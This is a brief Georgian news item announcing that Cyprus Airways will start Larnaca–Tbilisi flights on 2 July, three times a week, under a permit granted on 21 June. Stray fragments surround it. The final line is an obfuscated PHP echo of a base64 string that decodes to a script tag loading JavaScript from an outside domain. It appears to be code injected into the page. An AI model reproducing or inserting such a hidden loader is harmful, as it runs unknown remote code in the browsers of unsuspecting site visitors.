celsiusi
ავერსი შნაიდერი

საქართველოს მიმართულებით ოპერირებას ახალი ავიაკომპანია Cyprus Airways-ი იწყებს.

კვიპროსის რესპუბლიკაში დაფუძნებული ავიაკომპანია Cyprus Airways-ი ლარნაკა-თბილისი-ლარნაკას საჰაერო ხაზზე რეგულარული რეისების შესრულებას იწყებს.

სამოქალაქო ავიაციის სააგენტოში ავიაკომპანიის მიერ წარმოდგენილი განაცხადის შესაბამისად, ლარნაკასა და თბილისს შორის ფრენები მიმდინარე წლის 2 ივლისიდან შესრულდება. ავიარეისები განხორციელდება ყოველ ორშაბათს, ოთხშაბათს და კვირას.

ცნობისთვის, საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს სსიპ სამოქალაქო ავიაციის სააგენტომ Cyprus Airways-ს აღნიშნული მიმართულებით ოპერირების ნებართვა 21 ივნისს მიანიჭა.

შეგახსენებთ, ლარნაკას მიმართულებით რეისებს ქუთაისის აეროპორტიდან ავიაკომპანია "ვიზეარიც" ასრულებს.

407
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");